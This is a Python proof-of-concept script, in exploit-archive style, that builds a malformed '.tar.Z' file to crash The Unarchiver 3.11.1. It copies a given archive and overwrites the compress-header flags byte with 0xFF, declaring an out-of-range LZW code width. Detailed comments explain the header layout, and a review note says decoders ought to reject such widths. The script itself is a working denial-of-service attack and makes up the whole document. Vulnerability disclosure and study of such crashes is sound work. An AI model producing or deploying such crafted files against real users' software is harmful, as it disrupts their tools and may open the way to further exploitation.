# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
import os
import shutil
import struct
import sys
from mmap import mmap
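# The script needs the path of the archive to copy and patch. Without it,
# print the usage line and stop with a non-zero status so a calling script
# can tell the run did nothing.
if len(sys.argv) <= 1:
    print("Usage: python Local_Crash_PoC.py [file name]")
    sys.exit(1)

file_name = sys.argv[1]

# The input archive is only read at this point, so it is opened read-only
# and closed as soon as the read finishes. This keeps the original file from
# being held open for writing and avoids leaking the handle when file_mod is
# rebound to the copy further down. It also fails early, with the usual
# IOError/OSError, when the path does not exist or is unreadable.
# file_hash holds the raw bytes of the input; nothing else in this listing
# reads it.
with open(file_name, 'rb') as source_file:
    file_hash = source_file.read()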
def get_extension(file_name):
    """Return the full extension of *file_name*, leading dot included.

    Only the base name is examined, so dots in directory components are
    ignored. Everything after the FIRST dot counts as the extension, which
    keeps compound suffixes such as ``.tar.Z`` intact.

    Returns ``None`` when the base name has no dot or nothing follows it.
    """
    # partition() splits on the first dot only; the tail is the same text
    # that joining every dot-separated piece after the first would give.
    _, _, suffix = os.path.basename(file_name).partition('.')
    if not suffix:
        return None
    return '.' + suffix
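def file_maping():
    """Overwrite the byte at offset 2 of the file behind ``file_mod`` with 0xFF.

    Reads the module-level ``file_mod``, which must be a file object opened
    in ``'r+b'`` mode; the whole file is memory-mapped and one byte is
    changed in place.

    In the compress(1) ``.Z`` layout (see the lzw.h linked in this file's
    header), offset 2 is the flags byte that follows the two magic bytes:
    the low five bits declare the maximum LZW code width and the top bit
    selects block mode. 0xFF therefore declares a 31-bit width, above the
    16 bits that header defines as BITS.
    NOTE(review): the crash named in the title presumably comes from a
    decoder that uses this field without range-checking it; this listing
    does not confirm the root cause. A decoder should reject a header whose
    declared width exceeds what it supports.

    Raises:
        ValueError: if the file is shorter than three bytes (mmap itself
            also refuses to map an empty file).
    """
    mapping = mmap(file_mod.fileno(), 0)
    try:
        if len(mapping) < 3:
            raise ValueError("file too short: no byte at offset 2")
        # Slice assignment accepts a bytes value on both Python 2 and 3,
        # whereas write_byte() takes a str on 2 and an int on 3.
        mapping[2:3] = b'\xff'
    finally:
        # Release the mapping even when the length check or the write fails.
        mapping.close()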
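# Name the output after the input's full extension. get_extension() returns
# None for a name without one; fall back to an empty suffix instead of
# failing on str + None.
new_file_name = "Local_Crash_PoC" + (get_extension(file_name) or '')

# Never patch the input in place: if the output path resolves to the input
# itself, stop before anything is written.
if os.path.realpath(file_name) == os.path.realpath(new_file_name):
    sys.exit('[-] Input and output are the same file: ' + new_file_name)

# Copy inside the process rather than through a shell command string. The
# file name comes straight from the command line, so spaces or shell
# metacharacters in it must not be interpreted, and the copy has to be
# complete before the file is reopened below.
shutil.copyfile(file_name, new_file_name)

# file_maping() reads this module-level handle; close it whether or not the
# patch step succeeds.
file_mod = open(new_file_name, 'r+b')
try:
    file_maping()
finally:
    file_mod.close()

print('[+] ' + 'Created file: ' + new_file_name)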